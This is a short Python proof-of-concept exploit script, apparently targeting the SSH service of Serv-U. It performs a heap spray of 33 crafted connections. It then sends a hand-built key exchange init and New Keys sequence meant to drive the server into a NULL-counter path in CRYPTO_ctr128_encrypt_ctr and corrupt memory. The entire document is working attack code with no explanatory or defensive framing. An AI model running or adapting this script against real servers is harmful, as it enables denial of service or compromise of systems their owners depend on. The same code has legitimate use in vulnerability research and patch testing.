import socket
import struct
import sys

server_IP = '127.0.0.1'
port = 22
alloc_size = 0x108
rop = bytearray(alloc_size);

def write_qw(o, qw): rop[o:o+8] = struct.pack('<Q', qw);
for i in range(alloc_size):
    write_qw(i, 0x41)    

write_qw(0x100, 0x00 * 8) #To make dat->stream.ctr allways NULL and execute CRYPTO_ctr128_encrypt_ctr function

spray = struct.pack('>IBBH', alloc_size, 5, 99, 0) + rop;
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

#Spray 33 objects with size 0x108
for _ in range(33):
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
    client.connect((server_IP,port))
    client.send(b'SSH-2.0-\r\n' + spray)
    client.close()

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
client.connect((server_IP,port))
client.send(b'SSH-2.0-Serv-U-PoC_0.1\r\n')#Banner
response = client.recv(4096)  
client.send(b'\x00\x00\x00\x76' + '\x00' + '\x14' + '\x3B\xBC\x34\x64\xDC\xB4\x1C\xB6\x23\x3F\x54\x34\xE5\x1F\xD4\x30' + '\x00\x00\x00\x12' + 'ecdh-sha2-nistp256' + '\x00\x00\x00\x07' + 'ssh-rsa' + '\x00\x00\x00\x0A' + 'aes128-ctr' + '\x00\x00\x00\x04' + 'none' + '\x00\x00\x00\x04' + 'none' + '\x00\x00\x00\x04' + 'none' + '\x00\x00\x00\x04' + 'none' + '\x00\x00\x00\x04' + 'none' + '\x00\x00\x00\x00' + '' + '\x00\x00\x00\x00' + '' + '\x00' + '\x00\x00\x00\x00')#key Exchange Init
client.send(b'\x00\x00\x00\x0c' + '\x00' + '\x15')#New Keys
client.send(b'SSH-2.0-\r\n' + spray)   
client.close()